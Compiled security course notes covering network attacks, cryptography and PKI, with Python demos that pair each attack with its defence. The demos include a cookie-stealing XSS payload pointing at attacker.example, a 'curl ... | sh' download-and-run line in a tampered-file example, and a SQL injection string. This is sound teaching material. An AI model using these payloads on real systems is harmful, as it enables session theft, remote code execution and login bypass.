IAS 2 (Compiled Notes)

Types of Security
➢ Computer Security: A generic term for the collection of tools designed to protect data and thwart hackers.
➢ Network Security: Measures to protect data during transmission.
➢ Internet Security: Measures to protect data during transmission over interconnected networks.

Goals of Security (CIA)
✓ Confidentiality: Prevents unauthorized use or disclosure of information.
✓ Integrity: Safeguards the accuracy and completeness of information.
✓ Availability: Ensures authorized users have reliable and timely access to information.

Terminology

Access Control - The ability to permit or deny the use of an object by a subject. It provides three essential services:
❖ Identification and Authentication: who can log in.
❖ Authorization: what an authenticated user is allowed to do.
❖ Accountability: identifies what a user did.

AAA
Authentication
Authorization
Accountability (the third A is also commonly expanded as Accounting)

Authentication - Validating the claimed identity of an end user or a device (e.g., host, server, switch, router). Must differentiate between user, device, and application authentication.

Authorization - Granting access rights to a user, group of users, system, or program, typically done in conjunction with authentication.

Non-Repudiation - A property of a cryptographic system that prevents a sender from later denying that they sent a message or performed a certain action.

Audit - A chronological record of system activities (an audit trail) that enables the reconstruction and examination of a sequence of events.

Vulnerability - A weakness in security procedures, network design, or implementation that can be exploited to violate a corporate security policy, such as:
✓ Software bugs
✓ Configuration mistakes
✓ Network design flaws

Exploit - Taking advantage of a vulnerability.

Risk - The possibility that a vulnerability will be exploited.
✓ Risk Analysis: The process of identifying security risks, determining their impact, and identifying areas requiring protection.

Threat - Any circumstance or event with the potential to cause harm to a networked system, such as:
• Denial of Service (DoS): Attacks that make resources unavailable to their intended users.
• Unauthorized Access: Access to devices or networks without the permission of their rightful owner.
• Impersonation, worms, viruses.

Risk Management vs. Cost of Security
▪ Risk Mitigation: The process of selecting appropriate controls to reduce risk to an acceptable level.
▪ Level of Acceptable Risk: Determined by comparing the risk of a security hole being exposed against the cost of implementing and enforcing the security policy.
▪ Assess the cost of particular losses and avoid spending more to protect an asset than it is worth.

Attack Sources
• Active vs. Passive:
o Active: Writing data to the network, often disguising one's own address (spoofing).
o Passive: Reading data on the network, breaching confidentiality.
• On-Path vs. Off-Path:
o On-Path: An attacker on the route (e.g., one who controls a router) can read, modify, or remove any transmitted datagram.
o Off-Path: A host that is not on the route can send datagrams appearing to come from other hosts but cannot receive the datagrams meant for them.
• Insider vs. Outsider: Depends on the definition of the perimeter/border.
• Deliberate Attack vs. Unintentional Event: Configuration errors and software bugs can be as harmful as deliberate attacks.

Security Aims
✓ Controlling data/network access.
✓ Preventing intrusions.
✓ Responding to incidents.
✓ Ensuring network availability.
✓ Protecting information in transit.

Security Services
❖ Authentication
❖ Authorization
❖ Access Control
❖ Data Integrity
❖ Data Confidentiality
❖ Auditing/Logging
❖ DoS Mitigation

Layer 2 Attacks
▪ ARP Spoofing
▪ MAC Attacks
▪ DHCP Attacks
▪ VLAN Hopping

MAC Flooding
Exploits a limitation of switches: the fixed CAM table size.
CAM (Content Addressable Memory): Stores the mapping of individual MAC addresses to physical ports on the switch. The attacker sends frames with thousands of bogus source addresses until the table is full; the switch can then no longer learn legitimate addresses and floods frames for them out of every port, so the attacker sees traffic that would otherwise reach only its destination port.
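
Added worked example (not code from the notes): a toy learning switch in Python with a fixed-size CAM table, flooded with bogus source addresses, then the same switch with a port-security limit on the attacker's port. The topology (Alice on port 1, Bob on port 2, the attacker on port 3), the table size and the eviction rule are assumptions made for the simulation; real switches age entries out rather than evicting the oldest, but once the table is full the result is the same: unicast frames for unlearned addresses are flooded to every port.

```python
from collections import OrderedDict

# Constructed lab topology (an assumption for this example, not from the notes):
# a 4-port switch with Alice on port 1, Bob on port 2 and the attacker on port 3.
ALICE = "00:00:00:00:00:0a"
BOB = "00:00:00:00:00:0b"
BROADCAST = "ff:ff:ff:ff:ff:ff"
ATTACKER_PORT = 3
CAM_SIZE = 16   # toy size; real tables hold thousands of entries, the effect is the same


class Switch:
    """Minimal learning switch with a fixed-size CAM table and optional port security."""

    def __init__(self, ports, cam_size=CAM_SIZE, max_macs_per_port=None):
        self.ports = set(ports)
        self.cam = OrderedDict()                    # MAC -> port, oldest entry first
        self.cam_size = cam_size
        self.max_macs_per_port = max_macs_per_port  # port-security limit; None = off
        self.err_disabled = set()                   # ports shut down after a violation

    def _learn(self, src, port):
        if src in self.cam:
            self.cam.move_to_end(src)               # refresh an existing entry
            self.cam[src] = port
            return
        if self.max_macs_per_port is not None:
            learned_here = sum(1 for p in self.cam.values() if p == port)
            if learned_here >= self.max_macs_per_port:
                self.err_disabled.add(port)         # port security: too many MACs, shut the port
                return
        if len(self.cam) >= self.cam_size:
            self.cam.popitem(last=False)            # table full: the oldest entry is lost
        self.cam[src] = port

    def forward(self, src, dst, in_port):
        """Deliver one frame; returns the set of egress ports it is sent out of."""
        if in_port in self.err_disabled:
            return set()
        self._learn(src, in_port)
        if dst in self.cam:
            return {self.cam[dst]} - {in_port}
        return self.ports - {in_port}               # unknown destination: flood everywhere


def mac_flood_scenario(port_security=False):
    """Returns the ports a unicast frame from Alice to Bob reaches before and after the flood."""
    sw = Switch(ports=[1, 2, 3, 4], max_macs_per_port=1 if port_security else None)
    sw.forward(ALICE, BOB, 1)                       # switch learns Alice on port 1
    sw.forward(BOB, ALICE, 2)                       # and Bob on port 2
    before = sw.forward(ALICE, BOB, 1)              # {2}: delivered to Bob only

    # The attacker sprays frames with thousands of bogus source MAC addresses.
    for i in range(5000):
        bogus = "02:00:00:00:%02x:%02x" % (i >> 8, i & 0xFF)
        sw.forward(bogus, BROADCAST, ATTACKER_PORT)

    after = sw.forward(ALICE, BOB, 1)
    return before, after


if __name__ == "__main__":
    print("no port security:", mac_flood_scenario())       # ({2}, {2, 3, 4})
    print("port security:  ", mac_flood_scenario(True))    # ({2}, {2})
```

Without port security the flood pushes Alice's and Bob's entries out of the table, and the next frame to Bob is flooded out of ports 2, 3 and 4, including the attacker's. With a one-address limit on the port, the second bogus source address disables the attacker's port and the CAM table keeps its legitimate entries.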
VLAN Hopping
• An attack on a network with multiple VLANs: the attacker reaches traffic on a VLAN other than the one assigned to its port.
• Two primary methods:
o Switch Spoofing: The attacker's host negotiates a trunk link with the switch (typically by speaking the Dynamic Trunking Protocol), and a trunk carries every VLAN.
o Double Tagging: The frame is tagged twice; the first switch strips the outer tag (the native VLAN of the trunk) and forwards the frame with the inner tag into the target VLAN. Traffic flows one way only, since the victim cannot reply by the same trick.

DHCP Attacks
➢ DHCP Starvation Attack: Broadcasting numerous DHCP requests with spoofed MAC addresses simultaneously, exhausting the server's address pool so that legitimate clients get no lease.
➢ Rogue DHCP Server Attacks: An attacker-controlled server answers clients with leases whose default gateway or DNS server points at the attacker.

Cross-Site Scripting (XSS)
➢ Enables attackers to inject scripts into web pages viewed by others.
➢ Types:
o Persistent (stored) XSS: The payload is saved by the application and served to every user who views the page; more devastating.
o Non-persistent (reflected) XSS: The payload travels in the request (e.g., a URL parameter) and is reflected back in the response; more common.
o Example tool: BeEF (Browser Exploitation Framework), which uses an injected script to hook and control the victim's browser.

SQL Injection - A subset of the unverified-user-input class of vulnerabilities: untrusted input is spliced into the text of an SQL query, so the injected SQL is executed when the query is passed to the SQL server.
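
Added example for the SQL injection and XSS entries above (not code from the notes): a login query built by string concatenation beside its parameterized form, run against a constructed in-memory SQLite table, and a comment renderer with and without HTML escaping. The table contents, the payloads and the attacker.example host are constructed for the example.

```python
import html
import sqlite3

# Constructed sample data and payloads for this example (an assumption, not from the notes).
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def make_db():
    """In-memory users table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    return db


def login_vulnerable(db, name, password):
    """Unverified input is pasted into the query text, so it is executed as SQL."""
    query = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return db.execute(query).fetchone()


def login_parameterized(db, name, password):
    """Placeholders hand the input to the driver as data; it can never become SQL."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (name, password)).fetchone()


def render_comment_vulnerable(comment):
    """Reflects the submitted (or stored) comment into the page unchanged."""
    return f'<p class="comment">{comment}</p>'


def render_comment_escaped(comment):
    """Encodes the characters that would let the comment break out of the text node."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def demo():
    db = make_db()
    return {
        # With the payload as the password the WHERE clause becomes
        # ... AND password = '' OR '1'='1', which is true for every row.
        "sqli_vulnerable": login_vulnerable(db, "alice", SQLI_PAYLOAD),
        "sqli_parameterized": login_parameterized(db, "alice", SQLI_PAYLOAD),
        "xss_vulnerable": render_comment_vulnerable(XSS_PAYLOAD),
        "xss_escaped": render_comment_escaped(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable login returns Alice's row without her password; the parameterized query returns nothing, because the payload is compared as a literal string. Likewise the escaped renderer turns the injected tag into harmless text, which is the whole defence against reflected and stored XSS alike: encode on output for the context the data lands in.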

DNS Cache Poisoning - Caching incorrect resource records from unauthorized sources, redirecting connections (web, email, network) to a target controlled by the attacker.

Common Types of Attacks
❖ Man-in-the-Middle Attack: Intercepts messages intended for a valid device.
❖ Ping sweeps and port scans.
❖ Hijacking and Spoofing: Setting up a fake device to trick others into sending messages to it.
❖ Sniffing: Capturing packets as they travel through the network.
❖ DoS and DDoS.

Wireless Attacks
WEP: The first security mechanism for 802.11 wireless networks, vulnerable to the "FMS attack" discovered by Fluhrer, Mantin, and Shamir, which recovers the key from the weak way WEP uses the RC4 stream cipher. WEP is obsolete and should not be deployed.

Man-in-the-Middle Attacks (Wireless) - The attacker creates a fake access point ("evil twin") for clients to associate with, capturing their traffic and reading usernames, passwords, and anything else sent in clear text.

Layer 3 Attacks
• ICMP Ping Flood
• ICMP Smurf
• Ping of Death

TCP Attacks
• SYN Flood: An attacker sends SYN requests in rapid succession (usually from spoofed source addresses) and never completes the handshake, causing the host to retain bogus half-open connections until its backlog is exhausted and new legitimate connections are refused.

Routing Attacks
➢ Attempt to poison routing information.
➢ Distance Vector Routing: A malicious router announces zero distance to all destinations, attracting traffic that it can then black-hole or eavesdrop on.
➢ Link State Routing: A malicious router can randomly drop links or claim direct links to other routers.
➢ BGP Attacks: ASes can announce arbitrary prefixes or alter paths (prefix hijacking).
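
Added example for the SYN flood entry above (not code from the notes): a simulated TCP listener that keeps half-open connections in a bounded backlog, flooded by spoofed sources that never send the final ACK, beside the same listener using SYN cookies, where the server's initial sequence number is derived from the connection tuple and a secret so that no state is stored until the handshake completes. The backlog size, the addresses, the secret and the simplified cookie (real SYN cookies also encode a timestamp and an MSS index) are assumptions made for this example.

```python
import hashlib
import hmac
import struct

# Constructed scenario (an assumption for this example, not from the notes):
# a listener with a 128-entry SYN backlog, 1000 spoofed sources that never
# complete the handshake, then one legitimate client.
BACKLOG = 128
SERVER_SECRET = b"rotate-me-periodically"   # hypothetical secret for the cookie MAC


class Listener:
    """Server side of the TCP handshake, with and without SYN cookies."""

    def __init__(self, backlog=BACKLOG, syn_cookies=False):
        self.backlog = backlog
        self.syn_cookies = syn_cookies
        self.half_open = {}          # (src_ip, src_port) -> server ISN, awaiting the ACK
        self.established = set()
        self.dropped_syns = 0

    def _cookie(self, src_ip, src_port):
        # Stateless ISN derived from the connection tuple and a server secret.
        # Simplified: real SYN cookies also encode a timestamp and the MSS index.
        msg = f"{src_ip}:{src_port}".encode()
        mac = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
        return struct.unpack(">I", mac[:4])[0]

    def on_syn(self, src_ip, src_port):
        """Handle a SYN; returns the ISN sent in the SYN-ACK, or None if dropped."""
        key = (src_ip, src_port)
        isn = self._cookie(src_ip, src_port)
        if self.syn_cookies:
            return isn                           # nothing is stored per connection
        if len(self.half_open) >= self.backlog:
            self.dropped_syns += 1               # backlog full: legitimate SYNs die here
            return None
        self.half_open[key] = isn
        return isn

    def on_ack(self, src_ip, src_port, ack):
        """Handle the final ACK; returns True when the connection is established."""
        key = (src_ip, src_port)
        if self.syn_cookies:
            ok = ack == ((self._cookie(src_ip, src_port) + 1) & 0xFFFFFFFF)
        else:
            isn = self.half_open.pop(key, None)
            ok = isn is not None and ack == ((isn + 1) & 0xFFFFFFFF)
        if ok:
            self.established.add(key)
        return ok


def syn_flood_scenario(syn_cookies=False, attackers=1000):
    """Returns (legitimate client connected?, number of SYNs dropped)."""
    srv = Listener(syn_cookies=syn_cookies)
    for i in range(attackers):                   # spoofed sources: SYN only, never ACK
        srv.on_syn(f"198.51.100.{i % 256}", 40000 + i)
    isn = srv.on_syn("192.0.2.10", 51515)        # the legitimate client
    connected = isn is not None and srv.on_ack("192.0.2.10", 51515, (isn + 1) & 0xFFFFFFFF)
    return connected, srv.dropped_syns


if __name__ == "__main__":
    print("plain backlog:", syn_flood_scenario())       # (False, 873)
    print("SYN cookies:  ", syn_flood_scenario(True))   # (True, 0)
```

With a plain backlog the first 128 spoofed SYNs fill the table and everything after them, including the legitimate client's SYN, is dropped. With SYN cookies the server keeps no per-connection state until a valid ACK arrives, so the spoofed SYNs cost it nothing and the legitimate client completes its handshake.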

Application Layer Attacks
▪ Applications that don't authenticate properly.
▪ Authentication Information in Clear: Vulnerabilities in protocols like FTP, Telnet, and POP, which send credentials unencrypted.
▪ DNS Insecurity: Includes DNS poisoning and DNS zone transfer.

Common Types of Application Layer Attacks
❖ Scripting vulnerabilities
❖ Cookie poisoning
❖ Buffer overflow
❖ Hidden field manipulation
❖ Parameter tampering
❖ Cross-Site Scripting (XSS)
❖ SQL Injection

Server-Side Scripting
• Programs executed on the server rather than in the user's browser (e.g., ASP.NET, PHP, mod_perl, CGI, Ruby, Python).
• Benefits: Cross-platform, no plugin required.
• Disadvantages: Dynamic scripts create security concerns, since flaws in the code can be exploited by anyone who can reach the server.

Cryptography - Has evolved into a complex science in the field of information security.

What is Cryptography?
Part of a field of study known as cryptology, which includes:
▪ Cryptography: The study of methods for secret writing: transforming messages into an unintelligible form and recovering them using some secret knowledge (a key).
▪ Cryptanalysis: The analysis of cryptographic systems, their inputs, and their outputs in order to derive confidential information.

Key Concepts in Cryptography
✓ Encryption: The process of transforming plaintext into ciphertext using a cryptographic key.
✓ Symmetric Key Cryptography: Uses a single key for both encryption and decryption (also known as secret-key cryptography; the one key must be kept private by both parties).
✓ Asymmetric Key Cryptography: Uses separate keys for encryption and decryption (public and private key pairs).

Terminology of Cryptography
• Cipher: A cryptographic technique (algorithm) that applies a secret transformation to messages.
• Plaintext/Cleartext: The original message or data.
• Ciphertext: The unintelligible, encrypted form of the plaintext.
• Decryption: Transforming ciphertext back into the original plaintext.
• Cryptographic Key: The secret knowledge used by a cipher to encrypt or decrypt a message.

Symmetric Key Algorithms
➢ Stream Ciphers: Encrypt the bits of the message one at a time.
➢ Block Ciphers: Take a block of bits and encrypt it as a single unit.

Digital Signatures - In the textbook (RSA) description, the sender applies their own private key to the message instead of encrypting it with the intended receiver's public key; in practice the private-key operation is applied to a hash of the message, and anyone holding the sender's public key can verify the result.

Message Digests - A condensed representation of a message, produced by hashing.

Secret Key Algorithms
• DES (Data Encryption Standard):
o Block cipher using shared-key encryption with a 56-bit key.
o Developed by IBM for the US government in 1973-1974, approved in November 1976.
o Block size: 64 bits.
o A 56-bit key is far too short today and can be recovered by brute force.
• 3DES (Triple DES):
o Applies DES three times to each data block using a key bundle (K1, K2, K3) of 56 bits each (excluding parity).
o Disadvantage: Very slow (three DES operations per block).
• AES (Advanced Encryption Standard):
o Published in November 2001 as a replacement for DES.
o Symmetric block cipher with a fixed block size of 128 bits and key sizes of 128, 192, or 256 bits.
o Based on the Rijndael cipher developed by Joan Daemen and Vincent Rijmen.

Hash Functions - A hash function takes an input message of arbitrary length and outputs a fixed-length code, called the hash or message digest.

Uses of Hashing
o Verifying file integrity: If the hash changes, the data was either compromised or altered in transit.
o Digitally signing documents (the signature is computed over the digest rather than over the whole document).
o Hashing passwords (with a per-user salt and a deliberately slow function such as PBKDF2, bcrypt, scrypt, or Argon2; a plain unsalted digest is not adequate).

Common Hash Functions
❖ MD5: Outputs a 128-bit fingerprint of an arbitrary-length input.
❖ SHA-1: Outputs a 160-bit message digest, historically widely used in security applications (TLS, SSL, PGP, SSH, S/MIME, IPsec).
Both MD5 and SHA-1 are broken with respect to collision resistance and must not be used for signatures or certificates; SHA-256 (SHA-2) or SHA-3 should be used instead.

Diffie-Hellman
Protocol: Requires both sender and recipient to have key pairs. By combining one's own private key with the other party's public key, both parties compute the same shared secret number, which an eavesdropper who sees only the public values cannot compute.

DH Man-in-the-Middle Attack - Unauthenticated Diffie-Hellman is subject to a man-in-the-middle attack: an attacker who substitutes their own public value in both directions ends up sharing a separate key with each party and can read and re-encrypt everything. Digital signatures on the "public values" enable each party to verify the authenticity of the value it received.

Trusted Network
• Standard defensive-oriented technologies:
o Firewall
o Intrusion Detection
• Build trust on top of the TCP/IP infrastructure:
o Strong authentication
o Public Key Infrastructure (PKI)

Strong Authentication
• An absolute requirement involving:
o Two-factor authentication (something you know and something you have).
• Examples of factors: Passwords, Tokens, Tickets, Restricted access, PINs, Biometrics, Certificates. A password or PIN alone is a single factor; strong authentication combines two factors of different kinds.

Public Key Infrastructure (PKI)
• A framework that builds the network of trust.
• Combines public key cryptography and digital signatures to ensure:
o Confidentiality
o Integrity
o Authentication
o Non-repudiation
o Access control
• Protects applications that require a high level of security.

PKI Components
➢ Certificate Authority (CA): A trusted third party that issues (signs) certificates, binding a public key to an identity.
➢ Registration Authority (RA): Verifies the identity of applicants on behalf of the CA before a certificate is issued.
➢ Validation Authority (VA): Tells relying parties whether a certificate is still valid (e.g., its revocation status).

Digital Certificates
✓ The basic element of PKI; a secure credential that identifies the owner (also called a public key certificate).
✓ Addresses the binding of a public key to an entity, which is crucial for eCommerce.

Components of a Digital Certificate
• User's public key.
• User's ID.
• Additional information (e.g., validity period).
• The CA's signature over the fields above, which is what makes the binding trustworthy.
• Examples: X.509 (standard), PGP (Pretty Good Privacy).

X.509
➢ An ITU-T standard for public key infrastructure (PKI) and Privilege Management Infrastructure (PMI), used for certificate-based single sign-on; it defines the format of public key certificates.
➢ Assumes a strict hierarchical system of Certificate Authorities (CAs).
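
Added example for the Diffie-Hellman and DH man-in-the-middle entries above (not code from the notes): an honest exchange, then Mallory substituting her own public value in both directions and sharing a key with each side, and a fingerprint comparison of the public value Alice received against the one Bob actually sent, which is the check that a signature on the public values (or an out-of-band comparison, as SSH host-key fingerprints do) provides. The group (the 1024-bit MODP group of RFC 2409, chosen so the arithmetic is real), the fingerprint format and the use of a fingerprint instead of a signature are choices made for this example.

```python
import hashlib
import secrets

# 1024-bit MODP group from RFC 2409 (Oakley group 2), generator 2. Chosen here so
# the arithmetic is real; new deployments should use a 2048-bit or larger group.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF",
    16,
)
G = 2


def keypair():
    """Ephemeral DH key pair: private exponent x and public value g^x mod p."""
    priv = secrets.randbelow(P - 3) + 2            # 2 <= priv <= P - 2
    return priv, pow(G, priv, P)


def shared_secret(priv, peer_pub):
    """Combine own private key with the peer's public value: peer_pub^priv mod p."""
    if not 2 <= peer_pub <= P - 2:                  # reject 0, 1 and p-1 (trivial secrets)
        raise ValueError("invalid Diffie-Hellman public value")
    return pow(peer_pub, priv, P)


def fingerprint(pub):
    """Short SHA-256 fingerprint of a public value, for out-of-band comparison."""
    return hashlib.sha256(pub.to_bytes(128, "big")).hexdigest()[:16]


def honest_exchange():
    """Returns True when Alice and Bob derive the same shared secret."""
    a, A = keypair()
    b, B = keypair()
    return shared_secret(a, B) == shared_secret(b, A)


def mitm_exchange():
    """Mallory swaps each public value for her own and shares a key with each side."""
    a, A = keypair()
    b, B = keypair()
    m, M = keypair()                                # Mallory's key pair
    k_alice = shared_secret(a, M)                   # Alice received M, believing it is B
    k_bob = shared_secret(b, M)                     # Bob received M, believing it is A
    return {
        "alice_bob_agree": k_alice == k_bob,
        "mallory_has_alice_key": k_alice == shared_secret(m, A),
        "mallory_has_bob_key": k_bob == shared_secret(m, B),
        # Comparing the fingerprint of the value Alice received with the one Bob
        # actually sent (e.g. read out over the phone) exposes the substitution.
        "fingerprints_match": fingerprint(M) == fingerprint(B),
    }


if __name__ == "__main__":
    print("honest exchange agrees:", honest_exchange())
    for check, result in mitm_exchange().items():
        print(f"{check}: {result}")
```

Nothing in the arithmetic tells Alice or Bob that the value they received came from Mallory; only authentication of the public values (a signature, a certificate, or a fingerprint compared over a channel Mallory does not control) detects the attack.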

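
Added example for the hashing section above (not code from the notes): file-integrity verification with SHA-256, and password storage with salted PBKDF2-HMAC-SHA256 and a constant-time comparison, beside an unsalted MD5 digest to show why the salt matters. The sample file contents, the passwords and the iteration count are constructed for this example.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000      # OWASP's current recommendation for PBKDF2-HMAC-SHA256


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """Recompute the digest and compare it with the published one."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted, deliberately slow hash; the output carries what is needed to verify later."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported password hash")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def demo():
    # Constructed sample file and credentials (an assumption for this example).
    original = b"#!/bin/sh\necho installing\n"
    published = sha256_hex(original)
    tampered = original.replace(b"installing", b"installing; curl http://attacker.example | sh")
    stored = hash_password("correct horse battery staple")
    return {
        "original_ok": verify_integrity(original, published),
        "tampered_ok": verify_integrity(tampered, published),
        "right_password": verify_password("correct horse battery staple", stored),
        "wrong_password": verify_password("Tr0ub4dor&3", stored),
        # The same password hashed twice gives different strings because of the
        # random salt, so a precomputed table of digests (rainbow table) is useless.
        "salted_differ": hash_password("pw") != hash_password("pw"),
        # An unsalted MD5 of the same password is identical every time.
        "md5_identical": hashlib.md5(b"pw").hexdigest() == hashlib.md5(b"pw").hexdigest(),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The integrity check is only as good as the channel the published digest arrives over: a digest fetched from the same compromised server as the file proves nothing, which is why signed digests are preferred. For passwords, the stored string records the algorithm, iteration count and salt so that the cost factor can be raised later without invalidating existing entries.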